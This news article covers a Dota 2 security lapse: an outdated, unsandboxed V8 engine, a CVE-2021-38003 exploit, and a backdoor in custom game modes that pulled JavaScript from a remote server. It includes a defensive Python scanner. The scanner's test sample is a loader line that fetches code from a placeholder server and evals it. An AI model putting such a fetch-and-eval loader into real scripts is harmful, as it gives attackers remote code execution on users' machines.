
In context: Released in 2013, Dota 2 remains one of the most popular multiplayer experiences among MOBA fans. Over the course of 15 months, millions of Dota 2 players may have been exposed to remote code execution because of Valve's carelessness.
Valve is notorious for taking its time to make a new Half-Life game (any new game, really) or to count to three. The digital distribution giant, co-founded by Gabe Newell, also appears to have been lax about a dangerous security hole that put players of one of its most popular games at risk and let hackers run wild with malicious experiments.
The free-to-play MOBA game Dota 2 is still hugely popular, even though it was originally released almost 10 years ago on July 9, 2013. Like many other games, Dota 2 embeds the V8 JavaScript engine that Google develops for the Chromium/Chrome project. The fundamental problem is that, until recently, Valve was shipping an outdated build of V8 compiled in December 2018.
That more than four-year-old build is riddled with potentially dangerous security holes. To make matters worse, Dota 2 did not run V8 with any sandbox protection. Criminals could exploit this situation to remotely run malicious code targeting Dota players. According to Avast, that is exactly what happened before Valve finally updated the V8 engine.
Avast researchers discovered that an unknown hacker was testing a possible exploit for CVE-2021-38003, a particularly dangerous security flaw in the V8 engine with a severity score of 8.8/10. At first, the hackers tried what appeared to be a benign experiment, releasing a new custom game mode (a way for players to modify their Dota 2 experience) that embedded exploit code for CVE-2021-38003.
The hackers have since released three more game modes, taking a more stealthy approach and using a simple backdoor of only "about twenty lines of code." The backdoor can execute arbitrary JavaScript downloaded from the command and control server via HTTP. This neat trick lets the attackers hide the exploit code and update it easily without submitting new custom game modes for review and potential discovery. In other words, it lets the hackers dynamically execute JavaScript in the background (presumably exploiting the CVE-2021-38003 vulnerability).
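The loader pattern described above, a custom-mode script that fetches JavaScript over HTTP and executes it, is exactly the shape a review step for submitted game modes should flag. The following Python scanner is an added example written for this page; it is not Avast's analysis tooling or any Valve code. It assumes plain JavaScript sources that use the standard `fetch`/`XMLHttpRequest` APIs (the `$.AsyncWebRequest` name is an assumption about Panorama's HTTP helper), and the two sample scripts, including the server address, are constructed for the demonstration.

```python
import re
from dataclasses import dataclass

# Heuristic patterns (added example, not Avast's or Valve's tooling).
# Dynamic code execution: eval(...) or Function(...) / new Function(...).
DYNAMIC_EXEC = re.compile(r"\b(?:eval|Function)\s*\(")
# Fetching remote content: standard web APIs plus $.AsyncWebRequest, which is
# assumed here to be the Panorama UI name for an HTTP request helper.
REMOTE_FETCH = re.compile(r"\bfetch\s*\(|\bXMLHttpRequest\b|\$\.AsyncWebRequest\b")
# Hard-coded HTTP(S) URLs, the usual place a command and control address lives.
HTTP_URL = re.compile(r"https?://[^\s'\"]+")


@dataclass
class Finding:
    kind: str   # "dynamic-exec", "remote-fetch" or "url"
    line: int   # 1-based line number in the scanned script
    text: str   # the offending line, or the URL itself


def scan_script(source: str) -> list[Finding]:
    """Return every suspicious pattern found in a JavaScript source file."""
    findings: list[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith("//"):
            continue  # comment-only lines cannot execute anything
        if DYNAMIC_EXEC.search(line):
            findings.append(Finding("dynamic-exec", lineno, stripped))
        if REMOTE_FETCH.search(line):
            findings.append(Finding("remote-fetch", lineno, stripped))
        for url in HTTP_URL.findall(line):
            findings.append(Finding("url", lineno, url))
    return findings


def is_suspected_loader(source: str) -> bool:
    """A script that both pulls remote content and executes code dynamically
    matches the backdoor shape described in the article: fetch, then run."""
    kinds = {f.kind for f in scan_script(source)}
    return {"dynamic-exec", "remote-fetch"} <= kinds


# Constructed sample inputs; the server name is a placeholder, not a real C2.
BENIGN_SAMPLE = """\
// constructed sample: ordinary UI logic with no remote code loading
function onScoreChanged(score) {
  $("#score-label").text = "Score: " + score;
}
"""

SUSPECT_SAMPLE = """\
// constructed sample: pulls code from a placeholder server and runs it
const C2 = "http://c2.example.invalid/payload.js";
function update() {
  fetch(C2).then(r => r.text()).then(code => eval(code));
}
setInterval(update, 60000);
"""


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_SAMPLE), ("suspect", SUSPECT_SAMPLE)):
        print(f"{name}: suspected loader = {is_suspected_loader(sample)}")
        for f in scan_script(sample):
            print(f"  line {f.line}: {f.kind}: {f.text}")
```

This is a triage aid, not a verdict: a loader that builds the string `"ev" + "al"` or hides the URL behind string arithmetic slips past regular expressions, so a production review pipeline would parse the script with a real JavaScript parser and flag any call whose argument flows from a network response. The more durable fix is the one the article points at: keep the embedded engine current and run it inside a sandbox, so that even code the review step misses cannot escape the game's process.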
Google patched CVE-2021-38003 in October 2021. Meanwhile, the unknown hackers began experimenting in March 2022. Dota 2 developers did not bother to fix the issue until January 2023, when Avast informed them of its findings. Further analysis revealed that other exploits had been unsuccessful, and the true motivation of the Dota 2 hacker remains unknown.